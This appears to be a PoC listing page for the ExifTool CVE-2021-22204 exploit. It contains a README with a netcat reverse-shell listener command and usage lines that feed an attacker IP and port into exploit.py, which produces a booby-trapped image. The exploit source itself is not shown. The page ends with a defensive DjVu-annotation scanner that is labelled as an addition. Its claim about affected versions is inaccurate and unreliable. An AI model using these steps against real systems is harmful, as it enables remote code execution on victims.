CVE-2021-22204 PoC — exiftool code injection vulnerability

Source
Associated Vulnerability
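Title: exiftool code injection vulnerability (CVE-2021-22204)
Description: exiftool is an application that makes metadata more accessible. ExifTool versions 7.44 and earlier contain a code injection vulnerability that allows arbitrary code execution when a malicious image is parsed.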
Description
exiftool exploit
Readme
# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
   ## Youtube 
        404 notfound
## Requirements 
    python3 python3-pip djvulibre-bin exiftool

# Install requirements 

   ## Debian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Ubuntu
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Arch Linux
        pacman -S djvulibre libimage-exiftool-perl python python-pip
    
   ## Kali Linux
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Fedora
        dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
    
   ## OS X
        brew install djvulibre exiftool python
    
   ## Raspbian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
 
# How to run:
   ## Install python requirements
        sudo pip install -r requirements.txt

   ## Start reverse shell listener with netcat
        nc -nvlp 4444

   ## Give execute permission 
        chmod +x exploit.py
   ## Run program
        python3 exploit.py {Your IP address} {Your Listening port} 
        
   ### OR 
        
        ./exploit.py {Your IP address} {Your Listening port}
   ## Example
    
        python3 exploit.py 192.168.0.1 4444
        
   ### OR 
        
        ./exploit.py 192.168.0.1 4444
   ## Output file name is 
        image.jpg
        
# About the vulnerability

CVE-2021-22204 was discovered and reported by William Bowling (@wcbowling).

This exploit was made by studying the exiftool patch after the CVE was already reported.

The generated image.jpg triggers the vulnerability when it is opened with a vulnerable exiftool.
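
For defenders triaging uploaded or received images, the following added example (not part of the original README or of exploit.py) flags files that carry a DjVu container with annotation chunks inside another format. It assumes, per the public CVE record, that the flaw sits in ExifTool's handling of DjVu annotation data; `scan_bytes`, `iff_chunk` and the sample byte strings are hypothetical names and constructed data.

```python
import struct
import sys

DJVU_MAGIC = b"AT&TFORM"            # "AT&T" prefix + IFF "FORM" container
DJVU_FORMS = (b"DJVU", b"DJVM")     # single-page / multi-page form types
ANNOT_CHUNKS = (b"ANTa", b"ANTz")   # plain / BZZ-compressed annotation chunks


def scan_bytes(data: bytes) -> dict:
    """Locate DjVu containers in a file and report annotation chunks in them."""
    offsets, chunks = [], set()
    pos = data.find(DJVU_MAGIC)
    while pos != -1:
        # Layout: "AT&T"(4) "FORM"(4) big-endian size(4) form type(4)
        if data[pos + 12:pos + 16] in DJVU_FORMS:
            offsets.append(pos)
            chunks.update(c.decode() for c in ANNOT_CHUNKS if c in data[pos:])
        pos = data.find(DJVU_MAGIC, pos + 1)
    if not offsets or not chunks:
        verdict = "clean"
    elif offsets[0] == 0:
        verdict = "djvu-with-annotations"        # ordinary DjVu document
    else:
        verdict = "embedded-djvu-annotations"    # DjVu hidden inside another format
    return {"djvu_offsets": offsets, "annotation_chunks": sorted(chunks), "verdict": verdict}


def iff_chunk(chunk_id: bytes, body: bytes) -> bytes:
    """Build one IFF chunk (used only for the constructed samples below)."""
    return chunk_id + struct.pack(">I", len(body)) + body + b"\x00" * (len(body) % 2)


# Constructed sample data: a JPEG-like header, and the same header followed by a
# minimal DjVu container holding a harmless annotation.
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 9
DJVU_BODY = b"DJVU" + iff_chunk(b"INFO", b"\x00" * 10) + iff_chunk(b"ANTa", b'(metadata (title "sample"))')
SAMPLE_CLEAN = JPEG_STUB + b"\xff\xd9"
SAMPLE_EMBEDDED = JPEG_STUB + DJVU_MAGIC + struct.pack(">I", len(DJVU_BODY)) + DJVU_BODY + b"\xff\xd9"

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            result = scan_bytes(fh.read())
        print(f"{path}: {result['verdict']} {result['annotation_chunks']}")
```

A hit is a triage signal, not a verdict: a raw byte search can match by coincidence and misses DjVu data stored in compressed or encoded form, so flagged files should still be handled only with a patched ExifTool.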
File Snapshot

[4.0K] /data/pocs/7163951b5b882f164392f173ef0cb92c746123f5
├── [ 69K] exploit.py
├── [1.7K] README.md
└── [  58] requirements.txt

0 directories, 3 files